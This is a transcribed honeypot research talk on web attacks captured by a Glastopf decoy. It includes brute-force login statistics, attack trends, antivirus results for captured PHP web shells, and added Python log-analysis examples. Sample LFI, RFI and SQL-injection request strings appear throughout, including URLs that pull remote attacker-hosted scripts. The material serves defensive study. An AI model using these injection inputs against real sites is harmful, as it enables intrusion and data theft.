Web Attack Threat Analysis

Web Attack Threat Analysis: Experiences with the Glastopf honeypot
CAE Tech Talk – February 2016
Safwan Omari, [email protected]
Assistant Professor of MIS, College of Business, Lewis University

Outline
• Honeypot
• Deployment
• Attack trends
• Terminology
• Attack results
• Collected payloads

February 18, 2016

CAE Tech Talk

2

Honeypot – Glastopf
• Emulates web-based vulnerabilities
• Attracts attackers through Google dorks, e.g.
  • inurl:"category.asp?catid="
  • inurl:"content.asp?id="
• Glastopf announces thousands of vulnerabilities

Dork type   Number   Grew to
inurl       3507     10,351
intext      189      same
intitle     346      same

Type of vulnerabilities

Vulnerability              Possible attacks
Local File Inclusion /     - code execution on the client side, such as JavaScript (XSS)
Remote File Inclusion      - code execution on the web server
                           - sensitive information disclosure
                           - denial of service (DoS)
SQLi                       - disclosure of sensitive information
                           - data corruption
                           - loss of data
Style CSS                  - XSS via injection of JavaScript into a CSS style sheet
                           - disclosure of sensitive data
                           - running JavaScript in the victim's browser
                           - HTTP session hijacking
phpMyAdmin                 - web-based administration interface for MySQL databases
                           - multiple vulnerabilities
                           - execution of arbitrary commands
                           - compromise of the system
phpinfo                    - PHP script that discloses server/PHP information:
                             server version, OS, WWW root directory, PHP configuration

Example – LFI
• http://192.168.56.101/index.php?index=../../../../etc/passwd

Example – RFI
• http://192.168.56.101/index.php?index=http://pastebin.com/raw.php?i=GK9m8dAL

Example – SQLi
• http://192.168.56.101/index.php?id=22 (injected query: SELECT database())
• http://192.168.56.101/index.php?id=22 (injected query: SELECT user())

Web application products (emulated)
• phpMyAdmin
• PHP enter
• php-fusion module
• Xerox DocuShare
• Foafgen 0.3
• J-Pierre DEZELUS Les Visiteurs 2.0.1
• Many others (PHP-based and ASP-based)

Deployment
• Comcast business-class network, totally separate from the University network
• Given DNS names: www, smtp, financials
• With little effort, an attacker could easily tell it is a university network
• Hackers with moderate experience should figure out that it is a decoy system

Defending the honeypot
• Attackers don't play by the rules: they tried to take over the machine with brute-force attacks against sshd
• Logged in daily to monitor activity
  • Successful/bad login attempts
  • Rootkit checks (rkhunter, chkrootkit)
• Fighting bots and backdoors
  • Monitor all outgoing connections
  • Monitor open ports

Login attempts
• 7143 login attempts originated from 125 unique IPs
• From 25 countries: HK (4714), CN (916), FR (506), VN (301)
• User names tried (account, alex, apache, backup, D-Link and many more):
  • root: 5648
  • support: 926
  • admin: 220
• One IP (43.229.x.x, HK) tried 4150 times
• The rest ranged from 1 to 524 attempts per IP
• Average: 57 attempts per IP, 24 without the HK attacker
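Tallies like the ones above come from counting sshd log lines. As an added example (not code from the talk), the following Python parses an OpenSSH auth.log excerpt and produces the same kind of per-IP and per-user counts, the average with and without the single noisiest source, and a list of sources over a brute-force threshold. The log lines, host name, addresses and the "operator" account are constructed for the example.

```python
import re
from collections import Counter

# Constructed auth.log excerpt in the syslog format OpenSSH uses on
# Debian/Ubuntu. Host, addresses and the "operator" account are made up
# for this example; they are not the honeypot's real data.
SAMPLE_AUTH_LOG = """\
Dec  6 02:31:10 web sshd[2231]: Failed password for root from 43.229.0.10 port 51022 ssh2
Dec  6 02:31:12 web sshd[2231]: Failed password for root from 43.229.0.10 port 51022 ssh2
Dec  6 02:31:15 web sshd[2233]: Failed password for invalid user support from 43.229.0.10 port 51040 ssh2
Dec  6 02:31:20 web sshd[2235]: Failed password for invalid user admin from 113.0.0.7 port 40122 ssh2
Dec  6 02:31:25 web sshd[2237]: Invalid user D-Link from 113.0.0.7
Dec  6 02:31:26 web sshd[2237]: Failed password for invalid user D-Link from 113.0.0.7 port 40130 ssh2
Dec  6 02:40:01 web sshd[2240]: Accepted publickey for operator from 192.0.2.10 port 55000 ssh2
Dec  6 02:41:00 web sshd[2242]: Failed password for root from 198.51.100.9 port 33000 ssh2
"""

FAILED = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port")
ACCEPTED = re.compile(r"Accepted (\w+) for (\S+) from (\S+) port")


def summarize(log_text):
    """Tally failed logins per source IP and per user name, and list successes.

    "Invalid user" lines are ignored on purpose: sshd also writes a
    "Failed password" line for the same attempt, so counting both would
    double it.
    """
    per_ip, per_user, accepted = Counter(), Counter(), []
    for line in log_text.splitlines():
        m = FAILED.search(line)
        if m:
            user, ip = m.groups()
            per_ip[ip] += 1
            per_user[user] += 1
            continue
        m = ACCEPTED.search(line)
        if m:
            method, user, ip = m.groups()
            accepted.append((user, ip, method))
    return {"per_ip": per_ip, "per_user": per_user, "accepted": accepted,
            "total_failed": sum(per_ip.values())}


def average_per_ip(per_ip, exclude_top=False):
    """Mean failed attempts per IP; optionally drop the single noisiest
    source, as the slide does to show the average without the HK attacker."""
    counts = sorted(per_ip.values(), reverse=True)
    if exclude_top:
        counts = counts[1:]
    return sum(counts) / len(counts) if counts else 0.0


def brute_force_sources(per_ip, threshold):
    """IPs with at least `threshold` failed attempts, busiest first."""
    return [ip for ip, n in per_ip.most_common() if n >= threshold]


if __name__ == "__main__":
    s = summarize(SAMPLE_AUTH_LOG)
    print(f"{s['total_failed']} failed attempts from {len(s['per_ip'])} IPs")
    print("top users:", s["per_user"].most_common(3))
    print("avg/IP:", average_per_ip(s["per_ip"]),
          "without top source:", average_per_ip(s["per_ip"], exclude_top=True))
    print("brute-force sources (>=3):", brute_force_sources(s["per_ip"], 3))
    for user, ip, method in s["accepted"]:
        print(f"successful login: {user} from {ip} via {method}")
```

The "Accepted" lines are the ones worth alerting on for a honeypot that should only ever be entered by its operator; any success from an address other than the operator's means the box is no longer a decoy but a foothold.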

Terminology/metrics
• Event: any HTTP request
• Attack: a set of events originating from the same IP
  • Some attackers were determined and came back a few times
  • The time between events had to be considered when splitting one IP's events into attacks
• Length of an attack: time between its first and last events
• Number of events in an attack
• Number of patterns in an attack (LFI, RFI, SQLi, etc.)

Attack – examples
• 202.67.X.X – attack 1 (12 events)
  • 2015-12-06 02:32:28 /view_faq.php?id=999999.9 or 1=1
  • 2015-12-06 02:32:40 /view_faq.php?id='
  • 2015-12-06 02:33:00 /view_faq.php?id= union all select null,null,null,null,null,null--
• 202.67.X.X – attack 2 (25 events)
  • 2015-12-14 01:42:14 /Gallery/view/administrator/components/com_a6mambocredits/m2f/ViewProduct.asp?misc=
  • 2015-12-14 01:42:34 /Gallery/view/administrator/components/com_a6mambocredits/m2f/ViewProduct.asp?misc=9999 and 1=1
  • 2015-12-14 01:42:39 /Gallery/view/administrator/components/com_a6mambocredits/m2f/ViewProduct.asp?misc='
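To make the event/attack terminology and the pattern labels concrete, here is an added Python example (not code from the talk or from Glastopf) that classifies request paths into the pattern types used in this deck (phpMyAdmin, phpinfo, RFI, LFI, SQLi, unknown) and groups one IP's events into attacks using an inactivity gap, then reports the length, event count and pattern set of each attack. The sample events are constructed from the two 202.67.X.X excerpts above and the LFI/RFI/phpMyAdmin/phpinfo examples earlier in the deck; the full addresses, the third client 10.0.0.5, its timestamps and the 30-minute gap are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events modelled on the two 202.67.x.x excerpts on this
# slide and the LFI/RFI/phpMyAdmin/phpinfo examples earlier in the deck.
# The full IP addresses, the third client 10.0.0.5 and the timestamps of
# its requests are assumptions, not data from the talk.
SAMPLE_EVENTS = [
    ("202.67.0.1", "2015-12-06 02:32:28", "/view_faq.php?id=999999.9 or 1=1"),
    ("202.67.0.1", "2015-12-06 02:32:40", "/view_faq.php?id='"),
    ("202.67.0.1", "2015-12-06 02:33:00",
     "/view_faq.php?id= union all select null,null,null,null,null,null--"),
    ("202.67.0.1", "2015-12-14 01:42:14",
     "/Gallery/view/administrator/components/com_a6mambocredits/m2f/ViewProduct.asp?misc="),
    ("202.67.0.1", "2015-12-14 01:42:34",
     "/Gallery/view/administrator/components/com_a6mambocredits/m2f/ViewProduct.asp?misc=9999 and 1=1"),
    ("202.67.0.1", "2015-12-14 01:42:39",
     "/Gallery/view/administrator/components/com_a6mambocredits/m2f/ViewProduct.asp?misc='"),
    ("10.0.0.5", "2015-12-20 10:00:00", "/index.php?index=../../../../etc/passwd"),
    ("10.0.0.5", "2015-12-20 10:00:05", "/index.php?index=http://pastebin.com/raw.php?i=GK9m8dAL"),
    ("10.0.0.5", "2015-12-20 10:00:09", "/phpmyadmin/scripts/setup.php"),
    ("10.0.0.5", "2015-12-20 10:00:11", "/phpinfo.php"),
    ("10.0.0.5", "2015-12-20 10:00:13", "/"),
]

# Inactivity gap after which the next request from the same IP opens a new
# attack. The talk only says the time between events had to be considered;
# 30 minutes is an assumed threshold for this example.
ATTACK_GAP = timedelta(minutes=30)

# Ordered rules, first match wins. Product probes are matched on the path
# first; then RFI (a URL in a parameter value), LFI (traversal or a known
# target file) and finally SQLi (UNION SELECT, tautologies, quotes, comments).
PATTERNS = [
    ("phpmyadmin", re.compile(r"phpmyadmin", re.I)),
    ("phpinfo", re.compile(r"phpinfo", re.I)),
    ("RFI", re.compile(r"[?&][^=&]*=\s*(?:https?|ftp)://", re.I)),
    ("LFI", re.compile(r"\.\.[/\\]|/etc/passwd|boot\.ini", re.I)),
    ("SQLi", re.compile(r"union\s+(?:all\s+)?select|\b(?:or|and)\s+\d+=\d+|'|--", re.I)),
]


def classify(request):
    """Label one request path with the first attack pattern that matches."""
    for label, rx in PATTERNS:
        if rx.search(request):
            return label
    return "unknown"


def sessionize(events, gap=ATTACK_GAP):
    """Group (ip, 'YYYY-mm-dd HH:MM:SS', path) events into attacks.

    Requests from one IP stay in the same attack while consecutive events
    are at most `gap` apart. Each attack records the metrics from the slide:
    length (first to last event), number of events and the set of patterns.
    """
    by_ip = defaultdict(list)
    for ip, ts, req in events:
        by_ip[ip].append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), req))
    attacks = []
    for ip, evs in by_ip.items():
        current = None
        for ts, req in sorted(evs):
            if current is None or ts - current["last"] > gap:
                current = {"ip": ip, "first": ts, "last": ts, "events": 0, "patterns": set()}
                attacks.append(current)
            current["last"] = ts
            current["events"] += 1
            current["patterns"].add(classify(req))
    for a in attacks:
        a["duration_s"] = (a["last"] - a["first"]).total_seconds()
    return attacks


def repeat_attackers(attacks):
    """IPs seen in more than one attack, i.e. attackers who came back."""
    per_ip = defaultdict(int)
    for a in attacks:
        per_ip[a["ip"]] += 1
    return sorted(ip for ip, n in per_ip.items() if n > 1)


if __name__ == "__main__":
    attacks = sessionize(SAMPLE_EVENTS)
    for a in attacks:
        print(f"{a['ip']:<12} {a['first']} events={a['events']} "
              f"length={a['duration_s']:.0f}s patterns={sorted(a['patterns'])}")
    print("repeat attackers:", repeat_attackers(attacks))
```

The choice of gap decides whether the two 202.67.X.X sequences count as one attack or two: with a 30-minute gap they are two attacks from a repeat attacker; with a gap longer than the eight days between them they merge into one, which is why the talk had to consider the time between events before it could count attacks at all.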

Attack world map
[figure: world map of attacks]

Attack trends
[two figures: events per day (0 to 5000) and attacks per day (0 to 400), plotted over roughly 40 days]

Event types

Type                   Number   Percentage
phpinfo                15       0%
RFI                    65       0.1%
LFI                    315      0.4%
XSS – CSS stylesheet   660      0.8%
phpMyAdmin             7894     9.9%
SQLi                   42,572   53.3%
Unknown                27,071   35.4%

Attack events cont'd
• LFI: attackers are after c:\boot.ini and /etc/passwd
• RFI: remote files requested
  • http://u-braci.pl/components/com_user/Jubar.txt (Poland)
  • http://ropadeportiva.sexy/wp-includes/images/id.flv (GoDaddy)

Top 10 countries – events
Indonesia 39%, USA 30%, Other 8%, Morocco 6%, France 5%, Brazil 3%, Russia 2%, SG 2%, Turkey 2%, China 2%, KR 1%

Top 10 countries – attacks
Other 27%, USA 24%, Indonesia 15%, China 12%, Russia 6%, Brazil 5%, France 3%, NL 2%, DE 2%, MA 2%, UA 2%

Attack diversity
[figure: for Brazil, France, Morocco, USA and Indonesia, the share (0 to 100%) of each event type per country: unknown, style_css, sqli, phpinfo, RFI, LFI, phpmyadmin]

Attack characteristics

Country   avg. duration (min)   avg. events/attack   total attacks
BR        1.0                   16                   147
FR        0.5                   39                   94
MA        3.7                   74                   66
US        0.4                   31                   764
ID        3.6                   66                   479
RU        0.6                   7                    185
CN        3.5                   5                    375

Attack characteristics cont'd
• One-event attacks: see the home page and leave (20%)
• Time between events: events per second ranges from 0.0019 to 11.6
• Multiple attacks: percentage of attackers with more than one attack (10%)

Time of attacks
[figure: histogram of attacks (0 to 70) by hour of day, 0 to 23]

Malware analysis
• malwr
  • Free open malware analysis service based on Cuckoo
  • Traces system calls (APIs)
  • Captures and analyzes network traffic
  • Memory analysis with Volatility
• VirusTotal
  • A free online service and subsidiary of Google
  • Runs multiple antivirus engines and aggregates results
  • AegisLab, Agnitum, Alibaba, Antiy-AVL, AVG, ClamAV, etc. (54 engines)

Payloads

MD5 fingerprint   Size (bytes)   Date         Country               Malwr fingerprints   VirusTotal hits
Payload-0f788     112350         2015-12-06   Newtown Square, USA   3                    0/54
Payload-85a78     41155          2015-12-28   Samara, RU            0                    13/54
Payload-214db     1116           2016-01-01   Bogotá, CO            1                    35/54
Payload-432d0     112267         2015-12-13   NL                    1                    0/54
Payload-9162c     5794           2016-01-03   Lassance, BR          0                    4/54
Payload-9860d     112302         2015-12-15   Zurich, CH            1                    0/54
Payload-a38d2     95138          2015-12-10   Redwood City, US      3                    0/52

Payload-0f788
• Malwr fingerprints
  • Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate)
  • Installs itself for autorun at Windows startup

Payload-85a78
• Malwr did not detect any fingerprints
• VirusTotal: 13 hits/54; the detection names consistently describe an obfuscated PHP web shell

Engine           Detection
AegisLab         Script.Troj.Agent!c
AhnLab-V3        JS/SARS.S61
Avast            PHP:Agent-MN [Trj]
Bkav             CPRA349.Webshell
DrWeb            PHP.Siggen.16
ESET-NOD32       PHP/Obfuscated.E potentially unwanted
GData            Script.Trojan.Agent.MD5H0A
Ikarus           Backdoor.PHP.WebShell
NANO-Antivirus   Trojan.Html.Agent.bzzhwy
Qihoo-360        php.dkshell.0.116
Sophos           Troj/PhpShel-G
Symantec         PHP.Filesman
VBA32            suspected of Trojan.PHP.Obfuscated

Payload-214db
• Malwr fingerprints
  • Installs itself for autorun at Windows startup
• VirusTotal: 35 hits/54; the detection names consistently describe a PHP backdoor shell (engines that share a detection name are listed together)

Detection                      Engine(s)
Backdoor.PHP.ALI               ALYac, Ad-Aware, Arcabit, F-Secure, GData, MicroWorld-eScan, nProtect, Bitdefender
PHP/BackDoor.AG                AVG
Backdoor.PHP.PhpShell.bj!c     AegisLab, Antiy-AVL, Kaspersky
PHP.ShellBot.M                 Agnitum
PHP/Shellexec                  AhnLab-V3
PHP:Agent-RV [Trj]             Avast
PHP/Shell.CA.2                 Avira
VEX2650.Webshell               Bkav
HTML.BackDoor.A                CAT-QuickHeal
PHP.Shell-23                   ClamAV
UnclassifiedMalware            Comodo
PHP/Small.D                    Cyren, F-Prot
PHP.Shell.35                   DrWeb
PHP/Small.NAL                  ESET-NOD32
Backdoor.PHP.ALI (B)           Emsisoft
Backdoor.PHP.Agent             Ikarus
Backdoor:PHP/Shell.C           Microsoft
Trojan.Html.Zapchast.bubnpf    NANO-Antivirus
Malware.Radar01.Gen            Qihoo-360
Troj/PHPBdoor-A                Sophos
Php.Backdoor.Phpshell.Hnuz     Tencent
PHP_SHELL.GLT                  TrendMicro, TrendMicro-HouseCall
Backdoor.PHP.Rst.f             VBA32
Backdoor.PHP.C99shell.a (v)    VIPRE

Payload-432d0
• Malwr fingerprints
  • Installs itself for autorun at Windows startup

Payload-9162c
• Malwr did not detect any fingerprints
• VirusTotal: 4 hits/54; the detection names describe a PHP mass mailer

Engine           Detection
AhnLab-V3        PHP/Massmailer
Avira            PHP/MassMail.4127
NANO-Antivirus   Trojan.Html.Mailar.yrjmu
Qihoo-360        php.script.mailsend.3

Payload-9860d
• Malwr fingerprints
  • Installs itself for autorun at Windows startup

Payload-a38d2
• Malwr fingerprints
  • Installs itself for autorun at Windows startup
  • Performs some HTTP requests (Microsoft-WebDAVMiniRedir/5.1.2600, the User-Agent string of the Windows XP WebDAV mini-redirector, …)
  • Generates some ICMP traffic

Future work
• Looking closer into events
  • Possibility of correlating events to discover bots
  • Possibility of fingerprinting attack tools
• Performing more detailed malware analysis of the captured payloads
• Changing the decoy to see how attacks change, posing as a
  • Bank
  • Clinic

Acknowledgment
• Swetha Rajshree, graduate student, for her contribution throughout this project
• Faisal Abdullah (Chair) and Rami Khasawneh (Dean) for providing access to the computing and network resources that made this work possible